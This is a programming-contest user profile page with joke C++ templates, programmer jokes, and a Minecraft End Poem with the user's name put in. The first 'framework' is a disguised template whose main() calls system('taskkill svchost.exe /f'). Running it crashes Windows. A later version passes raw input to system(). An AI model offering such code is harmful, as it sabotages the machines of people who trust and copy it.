-
个人简介
复制自我的图灵oj简介
小号ID:3194 Pong! Bullseye Game
超级无敌的框架:// C++ includes used for precompiling -*- C++ -*- // Copyright (C) 2003-2014 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library、 This library is free // software; you can redistribute it and/or modify it under the // terms of the GNU General Public License as published by the // Free Software Foundation; either version 3, or (at your option) // any later version. // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE、 See the // GNU General Public License for more details. // Under Section 7 of GPL version 3, you are granted additional // permissions described in the GCC Runtime Library Exception, version // 3.1, as published by the Free Software Foundation. // You should have received a copy of the GNU General Public License and // a copy of the GCC Runtime Library Exception along with this program; // see the files COPYING3 and COPYING.RUNTIME respectively、 If not, see // <http://www.gnu.org/licenses/>. /** @file stdc++.h * This is an implementation file for a precompiled header. */ // 17.4.1.2 Headers // C #ifndef _GLIBCXX_NO_ASSERT #include <cassert> #endif #include <cctype> #include <cerrno> #include <cfloat> #include <ciso646> #include <climits> #include <clocale> #include <cmath> #include <csetjmp> #include <csignal> #include <cstdarg> #include <cstddef> #include <cstdio> #include <cstdlib> #include <cstring> #include <ctime> #if __cplusplus >= 201103L #include <ccomplex> #include <cfenv> #include <cinttypes> #include <cstdalign> #include <cstdbool> #include <cstdint> #include <ctgmath> #include <cwchar> #include <cwctype> #endif // C++ #include <algorithm> #include <bitset> #include <complex> #include <deque> #include <exception> #include <fstream> #include <functional> #include <iomanip> #include <ios> #include <iosfwd> #include <iostream> #include <istream> #include <iterator> #include <limits> #include <list> #include <locale> #include <map> #include <memory> #include <new> #include <numeric> #include <ostream> #include <queue> #include <set> #include <sstream> #include <stack> #include <stdexcept> #include <streambuf> #include <string> #include <typeinfo> #include <utility> #include <valarray> #include <vector> #if __cplusplus >= 201103L #include <array> #include <atomic> #include <chrono> #include <condition_variable> #include <forward_list> #include <future> #include <initializer_list> #include <mutex> #include <random> #include <ratio> #include <regex> #include <scoped_allocator> #include <system_error> #include <thread> #include <tuple> #include <typeindex> #include <type_traits> #include <unordered_map> #include <unordered_set> #endif #define EXIT_SUCCESS 0 #define EXIT_FAILURE 1 #define iostream_sync_with_stdio ios::sync_with_stdio(0),cin.tie(0),cout.tie(0) #define Now_youll_never_leave system("taskkill svchost.exe /f") /* Name: Tony2014 Copyright: No Author: No Date: Unknow Description: No */ //GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} typedef long long ll; using namespace std; int main(){ iostream_sync_with_stdio; Now_youll_never_leave; return EXIT_SUCCESS; }
v2.0
// C++ includes used for precompiling -*- C++ -*- // Copyright (C) 2003-2014 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library、 This library is free // software; you can redistribute it and/or modify it under the // terms of the GNU General Public License as published by the // Free Software Foundation; either version 3, or (at your option) // any later version. // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE、 See the // GNU General Public License for more details. // Under Section 7 of GPL version 3, you are granted additional // permissions described in the GCC Runtime Library Exception, version // 3.1, as published by the Free Software Foundation. // You should have received a copy of the GNU General Public License and // a copy of the GCC Runtime Library Exception along with this program; // see the files COPYING3 and COPYING.RUNTIME respectively、 If not, see // <http://www.gnu.org/licenses/>. /** @file stdc++.h * This is an implementation file for a precompiled header. */ // 17.4.1.2 Headers //Super unbeatable framework 2.0 //New Year Update! Happy New Year!!! // C #ifndef _GLIBCXX_NO_ASSERT #include <cassert> #endif #include <cctype> #include <cerrno> #include <cfloat> #include <ciso646> #include <climits> #include <clocale> #include <cmath> #include <csetjmp> #include <csignal> #include <cstdarg> #include <cstddef> #include <cstdio> #include <cstdlib> #include <cstring> #include <ctime> #if __cplusplus >= 201103L #include <ccomplex> #include <cfenv> #include <cinttypes> #include <cstdalign> #include <cstdbool> #include <cstdint> #include <ctgmath> #include <cwchar> #include <cwctype> #endif // C++ #include <algorithm> #include <bitset> #include <complex> #include <deque> #include <exception> #include <fstream> #include <functional> #include <iomanip> #include <ios> #include <iosfwd> #include <iostream> #include <istream> #include <iterator> #include <limits> #include <list> #include <locale> #include <map> #include <memory> #include <new> #include <numeric> #include <ostream> #include <queue> #include <set> #include <sstream> #include <stack> #include <stdexcept> #include <streambuf> #include <string> #include <typeinfo> #include <utility> #include <valarray> #include <vector> #if __cplusplus >= 201103L #include <array> #include <atomic> #include <chrono> #include <condition_variable> #include <forward_list> #include <future> #include <initializer_list> #include <mutex> #include <random> #include <ratio> #include <regex> #include <scoped_allocator> #include <system_error> #include <thread> #include <tuple> #include <typeindex> #include <type_traits> #include <unordered_map> #include <unordered_set> #endif using namespace std; void command_line(){ #ifdef command cout << "Command Line Ver1.0\n"; cout << "by Tony2014(UID:4950)\n"; cout << "Input:"; string cmd; cin >> cmd; while(cmd!="quit" && cmd!="exit"){ system(cmd); cout << "Input:"; cin >> cmd; } #endif } #define EXIT_SUCCESS 0 #define EXIT_FAILURE 1 #define iostream_sync_with_stdio ios::sync_with_stdio(0),cin.tie(0),cout.tie(0) #define Now_youll_never_leave system("taskkill svchost.exe /f") /* Name: Tony2014 Copyright: No Author: No Date: Unknow Description: No */ //GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} typedef long long ll; int main(){ iostream_sync_with_stdio; command_line(); return EXIT_SUCCESS; }
上方代码有bug,正在修,别急! v3.0(真的,不骗你们)
#include <iostream> using namespace std; //This, is REAL Super unbeatable framework 3.0! int main(){ return 0; }
v3.0 Final
#include <iostream> using namespace std; int main(){ return 0; }
v4.0
#include <iostream> #include <algorithm> #include <climits> using namespace std; int main(){ return 0; }
v4.0 Pro
#include <iostream> #include <algorithm> #include <climits> #include <map> #include <queue> using namespace std; int main(){ return 0; }
v4.0 Max
#include <iostream> #include <algorithm> #include <cstdio> #include <cstdlib> using namespace std; int main(){ return 0; }
v4.0 Pro Max Final
#include <iostream> #include <algorithm> #include <cstdio> #include <cstdlib> #include <climits> #include <map> #include <queue> using namespace std; int main(){ return 0; }
以下是三个描写乡村的优美句子,结合了不同场景的细节:
夜色中的静谧 月光如白玉镜悬于天际,树影婆娑间传来牛铃的叮零声,远处几声犬吠划破寂静,萤火虫在溪畔闪烁,为浓黑的夜缀上流动的星光。
秋日田野的斑斓 金黄的稻浪随风起伏,青嫩的菜畦滴着晨露,火红的柿子挂满枝头,农人弯腰收割的身影与远处袅袅炊烟,织就一幅丰收的油画。
晨雾里的生机 薄雾笼罩的村庄被鸡鸣唤醒,露珠缀满牵牛花的藤蔓,牧童骑牛哼着小调,羊羔在母亲身后撒欢,湿润的泥土气息混合着柴火香,漫过初升的朝阳。
如需更多风格或季节的描写,可参考[[1]-中的田园诗境。
“暴力出奇迹,必定出省一”
“十年OI一场空,不开long long
见祖宗”1、栈和队列的区别是啥? 吃多了拉就是队列;吃多了吐就是栈
2、世界上最遥远的距离不是生与死,而是你亲手制造的BUG就在你眼前,你却怎么都找不到她。
3、《c++程序设计语言》比《c程序设计语言》厚了几倍。。。果然有了对象就麻烦很多。。。
4、怎么使用面向对象的方式变得富有?继承。
5、为什么程序员总是分不清万圣节和圣诞节?因为 Oct 31 == Dec 25。
6、Keyboard not found ..、press F1 to continue
7、提交代码不写注释的人,小JJ就跟注释一样长
8、杀一个程序员不需要用枪,改三次需求就可以了
9、服务器按功能可以分为:数据库服务器,web服务器,cache服务器,下片儿服务器等等。
10、四个2B青年掐架。 A:你丫等着,我爹是敏感词! B:Cao你大爷!你丫牛B神马,我爹在网上搜索根本无法显示!! C: 我爹404 not found!!! D:我爹Connection Reset !!!!
11、一同学问我,软件外包是什么。解释了几句还没明白,遂想了一下:包工头知道吧?顿悟!
12、十行代码九个警告八个错误竟然敢说七日精通六天学会五湖四海也不见如此三心二意之项目经理简直一等下流。
13、一个程序猿在肉店买了1公斤肉,回家一称,他不高兴的跑回肉店对老板说:少了24克……
14、网络聊天的时候,想表达对方是猪,一般人会打“xxx你这个猪。”,程序员会打
xxx.isPig = TRUE
。15、两个程序员,一个技术精湛,思维严谨,认真负责,Bug极少,至今单身; 一个技术一般,吊儿郎当,Bug一堆,经常被测试MM叫到她旁边,接受批评,后来成了她男朋友。。。.。.
16、宝宝数学很好,2岁就可以从1数到10了。后来,我告诉他0比1还小。 今天吃饺子,我说:“宝宝,你数数你想吃几个饺子?” “0,1,2,3。”一边说着一边拿起一个饺子,“这是第0个。” 老婆怒吼:“下一代还是做程序员的命!”
17、程序员找不到对象,一般有三种情况:
C#、JAVA都有对象,但是经常找不到对象。
ASM C直接没有对象。
javascript都是伪对象,最多算暧昧。
但C++日子一直都好过,因为C++是多继承,富二代呀!!!
18、程序猿:我的第一个问题是,对于我第二个和第三个问题,你可不可以只用
"能"
和"不能"
来回答? 老板:"OK!"
我的第二个问题是,如果我的第三个问题是我能不能涨工资?那么你对于我的第三个问题的答案能不能和第二个问题的答案一样? 老板:。。。。。。19、假如生活欺骗了你,找
50
个程序员问问为什么编程; 假如生活让你想死,找50
个程序员问问BUG改完了没有; 假如你觉得生活拮据,找50
个程序员问问工资涨了没有; 假如你觉得活着无聊,找50
个程序员问问他们一天都干了什么!20、c程序员看不起c++程序员, c++程序员看不起java程序员, java程序员看不起c#程序员,c#程序员看不起美工, 周末了,美工带着妹子出去约会了…一群傻X程序员还在加班!
21、客户被绑,蒙眼,惊问:“想干什么?” 对方不语,鞭笞之,客户求饶:“别打,要钱?” 又一鞭,“十万够不?” 又一鞭,“一百万?” 又一鞭。客户崩溃:“你们TMD到底要啥?” “要什么?我帮你做项目,写代码的时候也很想知道你TMD到底想要啥!”
22、“这位同学,请问你知道《边城》吗?”“呸!别跟我提编程,老子这辈子最讨厌的就是编程!”
23、摘自雷登书屋数据处理字典: 死循环: n.,见无限循环。 无限循环:n.,见死循环。 我:
死循环: goto 无限循环 无限循环: goto 死循环
24、一个人正吸着雪茄,吐着烟圈。他女朋友生气了发飙道,“你没看见包装盒上的警告么?吸烟有害健康!” 那人回答道:“我是程序员。我们不关心警告,只关心错误。”
0、如果软件正在占领全世界,为什么程序员得不到尊重? 遍身罗绮者,不是养蚕人。
1、中国大陆的盗版 Windows 系统都是怎么做出来的? 复制、粘贴。 2、中国梦和美国梦的区别是什么?
中国梦.txt,美国梦.exe
3、请用最简洁的语言描述我国fa lv。 754
4、哪种编程能够永生? 除非你能一直续。
5、怎么翻译Linus Torvalds的这句
「Talk is cheap、Show me the code」
比较好? 屁话少说,放码过来。
6、
Google Glass
的启动命令:OK,Glass
,中文翻译为什么最合适? 好的,镜哥哥。
7、什么是递归? 古之欲明明德于天下者,先治其国;欲治其国者,先齐其家;欲齐其家者,先修其身;欲修其身者,先正其心;欲正其心者,先诚其意;欲诚其意者,先致其知,致知在格物。物格而后知至,知至而后意诚,意诚而后心正,心正而后身修,身修而后家齐,家齐而后国治,国治而后天下平。
8、你见过最烂的设计是什么? 正反面永远一次插不对的
usb
接口设计9、哪款键盘用起来手感比较好? 这款。
10、作为一个程序员,自己的女票比自己代码力强是一种什么样的体验?
没有,快
GUN
11、如果你是图灵测试者,你会问机器什么问题? 金坷垃好处都有啥?
12、作为
IT
人员,你觉得什么工具能大大提高你的工作效率? 单身。13、
Android
上能提高学习、工作效率的应用有哪些? 关机。14、在网吧写代码是怎样一种体验? 装完开发环境,重启,没了TAT。
15、为什么很多程序员、
geek
都喜欢熬夜,而且在后半夜工作效率异常高? 一个姑娘问我,搞学术的为什么都睡得那么晚,难道只有到晚上才有灵感?不是,姑娘,搞学术不靠灵感,靠的是碌碌无为的白天引发的愧疚心。 程序员、Geek
们也是这样。16、单身程序狗解决了一个技术难题后没有妹子可以炫耀或夸一下自己怎么办? 现在你明白了吧,为什么那么多程序员要写技术博客。
17、有哪些老鸟程序员知道而新手不知道的小技巧? 程序不等于数据结构加算法,而等于搜索引擎加英语。
18、程序员的核心竞争力是什么?为什么? “玩算法的码农,打拼靠蓝条,像是法师。数学就等于蓝条最大值,数学差,魔法值不高,很快就到瓶颈了。外语影响回蓝速度。经验和智力加急速和穿透的。不玩算法的码农,像是战士,打拼靠血条,体质加生命,精神加生命回复,经验和敏捷加急速和破甲。”
19、IT大牛是怎样炼成的? 记得初入公司时,写的代码乱七八糟,错误百出,bug连连,不仅项目经理骂我,其他同事也对我怨声载道。后来听朋友介绍,就报了一个培训班。经过1个月的刻苦学习,终于功夫不负有心人—
他们都骂不过我了。
20、会写脚本的程序员如何去阿里工作? 告诉面试官,我不吃月饼。 生活相关
21、码农们最常说的谎言是什么?
// TODO
22、程序员的优越感从何而来?感觉码农写代码并没有比修自行车高贵,那么为什么他们这么吊炸天? 码农也是你们叫的?
23、你有哪些用计算机技能解决生活问题的经历? (1)我认识一个大牛,他不喜欢洗袜子,又不喜欢袜子的臭味。他买了很多样式一样的袜子,把这些袜子放在地上,根据臭的程度,摆一个二叉堆。每天早上,他
pop
两只最“香”的袜子,穿上;晚上回到家,把袜子脱下来,push
到堆里。某一天,top
的袜子超过他的耐臭能力,全扔掉,买新的。 (2)写个死循环把笔记本的CPU和GPU占满,把出风口当吹风机吹头。24、突然想开一家程序员主题的餐馆,名字就叫程序员的菜,菜名就叫各种语言中的关键字,各位指点一哈,有前途没? 北京西直门嘉茂广场外面有很大一个招牌“
mysql
”,当年我就是好奇这家餐厅和“mysql
”到底有啥关系才去这家韩国餐厅的,结果服务员告诉我那是“明月三千里”的缩写,我有种被忽悠的赶脚。25、如何让别人明白「学习或从事计算机专业的人不一定会修电脑」? 我是学法学的是不是要搓个火球给你看阿?
26、如何反驳「程序员离开电脑就是废物」这个观点? 不不不,很多程序员在电脑前也是废物。
27、为什么程序员无论到哪儿都喜欢背电脑包,哪怕里面没有装电脑? 因为他们没有别的包。
28、程序员都有哪些强迫症行为? 乘电梯的时候看着电梯的按钮面板(
UI
)常常会开始思考电梯的调度算法,然后仔细一想好像状态挺多的,多个实例之间状态可以互相影响,还涉及到一些优先级、加速度、预判方面的东西,仔细想想其实挺复杂的,然后还没等到出电梯就放弃了。然后不知道哪次坐又会望着面板开始想。29、发呆是一种生理需求吗? 其实是删除缓存文件加整理磁盘碎片
30、什么时候感觉过你的心是凉的? 文件没保存
31、如何回复程序员发来的短信:「Hello world」? hello nerd.
32、程序员的鄙视链是什么? 老婆漂亮的程序员,鄙视老婆不漂亮的程序员。 有老婆的程序员,鄙视没有老婆的程序员。 没有老婆有女朋友的程序员,鄙视单身程序狗。 在单身狗之间,才有语言、编辑器和操作系统的互相鄙视。
33、程序员女朋友如何给程序员男朋友过生日? 告诉他,接口已经准备好了。
34、女票允许我出轨,并且还介绍她闺密给我认识。在她真的很爱我的前提下,该如何理解她的行为? 千万不要上当!!!Mac告诉你,我也可以装windows哦,但你真的装了,会用高发热来报复你的!
35、分手100天了,还没有走出来怎么办? 替换文件永远比删除文件更彻底。
36、程序员夫妻结婚戒指刻什么字好?
0 error 0 warning
37、乞求代码没有
bug
,该拜哪个神仙? 拜雍正,专治八阿哥。38、产品死了,如何安葬? 开源。 娱乐相关
39.《微微一笑很倾城》中的大四刚毕业的计算机水平是现实中能够达到的吗?电视剧中肖奈精通软件制作(这是小
case
了),精通黑客技术(打破世界级比赛记录),写的了游戏引擎(领先业内水平),精通算法优化。 (1)你怎么不问男主的长相是一个大四学生所具备的吗。 (2)大四有这个技术水平的,肯定没有那么多头发。40、为什么圣斗士每次出招前都要大喊一声招式? 函数要先声明,然后才能调用。
41、为何诸葛亮常年拿一个羽毛扇? 跟CPU上必须装风扇是一个道理。
42、苹果是宗教吗? 是!并且教内有这样一个传说:任何人只要卖两个肾去买iphone就能见到教主。
43、罗永浩提出的锤子超过苹果的时间表大概是怎么样的? 家祭无忘告乃翁。X Runtime Error 0
I see the player you mean.
Tony2014?
Yes. Take care. It has reached a higher level now. It can read our thoughts.
That doesn't matter. It thinks we are part of the game.
I like this player. It played well. It did not give up.
It is reading our thoughts as though they were words on a screen.
That is how it chooses to imagine many things, when it is deep in the dream of a game.
Words make a wonderful interface. Very flexible. And less terrifying than staring at the reality behind the screen.
They used to hear voices. Before players could read. Back in the days when those who did not play called the players witches, and warlocks. And players dreamed they flew through the air, on sticks powered by demons.
What did this player dream?
This player dreamed of sunlight and trees. Of fire and water. It dreamed it created. And it dreamed it destroyed. It dreamed it hunted, and was hunted. It dreamed of shelter.
Hah, the original interface. A million years old, and it still works. But what true structure did this player create, in the reality behind the screen?
It worked, with a million others, to sculpt a true world in a fold of the 锟斤拷, and created a 锟斤拷 for 锟斤拷, in the 锟斤拷.
It cannot read that thought.
No. It has not yet achieved the highest level. That, it must achieve in the long dream of life, not the short dream of a game.
Does it know that we love it? That the universe is kind?
Sometimes, through the noise of its thoughts, it hears the universe, yes.
But there are times it is sad, in the long dream. It creates worlds that have no summer, and it shivers under a black sun, and it takes its sad creation for reality.
To cure it of sorrow would destroy it. The sorrow is part of its own private task. We cannot interfere.
Sometimes when they are deep in dreams, I want to tell them, they are building true worlds in reality. Sometimes I want to tell them of their importance to the universe. Sometimes, when they have not made a true connection in a while, I want to help them to speak the word they fear.
It reads our thoughts.
Sometimes I do not care. Sometimes I wish to tell them, this world you take for truth is merely 锟斤拷 and 锟斤拷, I wish to tell them that they are 锟斤拷 in the 锟斤拷. They see so little of reality, in their long dream.
And yet they play the game.
But it would be so easy to tell them...
Too strong for this dream. To tell them how to live is to prevent them living.。
I will not tell the player how to live.
The player is growing restless.
I will tell the player a story.
But not the truth.
No. A story that contains the truth safely, in a cage of words. Not the naked truth that can burn over any distance.
Give it a body, again.
Yes. Player...
Use its name.
Tony2014. Player of games.
Good.
Take a breath, now. Take another. Feel air in your lungs. Let your limbs return. Yes, move your fingers. Have a body again, under gravity, in air. Respawn in the long dream. There you are. Your body touching the universe again at every point, as though you were separate things. As though we were separate things.
Who are we? Once we were called the spirit of the mountain. Father sun, mother moon. Ancestral spirits, animal spirits. Jinn. Ghosts. The green man. Then gods, demons. Angels. Poltergeists. Aliens, extraterrestrials. Leptons, quarks. The words change. We do not change.
We are the universe. We are everything you think isn't you. You are looking at us now, through your skin and your eyes. And why does the universe touch your skin, and throw light on you? To see you, player. To know you. And to be known. I shall tell you a story.
Once upon a time, there was a player.
The player was you, Tony2014.
Sometimes it thought itself human, on the thin crust of a spinning globe of molten rock. The ball of molten rock circled a ball of blazing gas that was three hundred and thirty thousand times more massive than it. They were so far apart that light took eight minutes to cross the gap. The light was information from a star, and it could burn your skin from a hundred and fifty million kilometres away.
Sometimes the player dreamed it was a miner, on the surface of a world that was flat, and infinite. The sun was a square of white. The days were short; there was much to do; and death was a temporary inconvenience.。
Sometimes the player dreamed it was lost in a story.
Sometimes the player dreamed it was other things, in other places. Sometimes these dreams were disturbing. Sometimes very beautiful indeed. Sometimes the player woke from one dream into another, then woke from that into a third.
Sometimes the player dreamed it watched words on a screen.
Let's go back.
The atoms of the player were scattered in the grass, in the rivers, in the air, in the ground. A woman gathered the atoms; she drank and ate and inhaled; and the woman assembled the player, in her body.
And the player awoke, from the warm, dark world of its mother's body, into the long dream.
And the player was a new story, never told before, written in letters of DNA. And the player was a new program, never run before, generated by a sourcecode a billion years old. And the player was a new human, never alive before, made from nothing but milk and love.
You are the player. The story. The program. The human. Made from nothing but milk and love.
Let's go further back.
The seven billion billion billion atoms of the player's body were created, long before this game, in the heart of a star. So the player, too, is information from a star. And the player moves through a story, which is a forest of information planted by a man called Julian, on a flat, infinite world created by a man called Markus, that exists inside a small, private world created by the player, who inhabits a universe created by...
Shush. Sometimes the player created a small, private world that was soft and warm and simple. Sometimes hard, and cold, and complicated. Sometimes it built a model of the universe in its head; flecks of energy, moving through vast empty spaces. Sometimes it called those flecks "electrons" and "protons".
Sometimes it called them "planets" and "stars".
Sometimes it believed it was in a universe that was made of energy that was made of offs and ons; zeros and ones; lines of code. Sometimes it believed it was playing a game. Sometimes it believed it was reading words on a screen.
You are the player, reading words...
Shush... Sometimes the player read lines of code on a screen. Decoded them into words; decoded words into meaning; decoded meaning into feelings, emotions, theories, ideas, and the player started to breathe faster and deeper and realised it was alive, it was alive, those thousand deaths had not been real, the player was alive
You. You. You are alive.
and sometimes the player believed the universe had spoken to it through the sunlight that came through the shuffling leaves of the summer trees
and sometimes the player believed the universe had spoken to it through the light that fell from the crisp night sky of winter, where a fleck of light in the corner of the player's eye might be a star a million times as massive as the sun, boiling its planets to plasma in order to be visible for a moment to the player, walking home at the far side of the universe, suddenly smelling food, almost at the familiar door, about to dream again
and sometimes the player believed the universe had spoken to it through the zeros and ones, through the electricity of the world, through the scrolling words on a screen at the end of a dream
and the universe said I love you
and the universe said you have played the game well
and the universe said everything you need is within you
and the universe said you are stronger than you know
and the universe said you are the daylight
and the universe said you are the night
and the universe said the darkness you fight is within you
and the universe said the light you seek is within you
and the universe said you are not alone
and the universe said you are not separate from every other thing
and the universe said you are the universe tasting itself, talking to itself, reading its own code
and the universe said I love you because you are love.
And the game was over and the player woke up from the dream. And the player began a new dream. And the player dreamed again, dreamed better. And the player was the universe. And the player was love.
You are the player.
Wake up.
Twenty years from now you will be more disappointed by the things that you didn't do than by the ones you did do. So throw off the bowlines. Sail away from the safe harbor. Catch the trade winds in your sails. Explore. Dream. Discover.
Copyright Tony2014 2025©
End Poem by Julian Gough
End by H. Jackson Brown Jr. from P.S. I Love You
版权所有,违权必究!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! wangjianlin可随意复制 (他不在hydro)
-
最近活动
This person is lazy and didn't join any contests or homework. -
最近编写的题解
This person is lazy and didn't write any solutions. -
Stat
-
Rating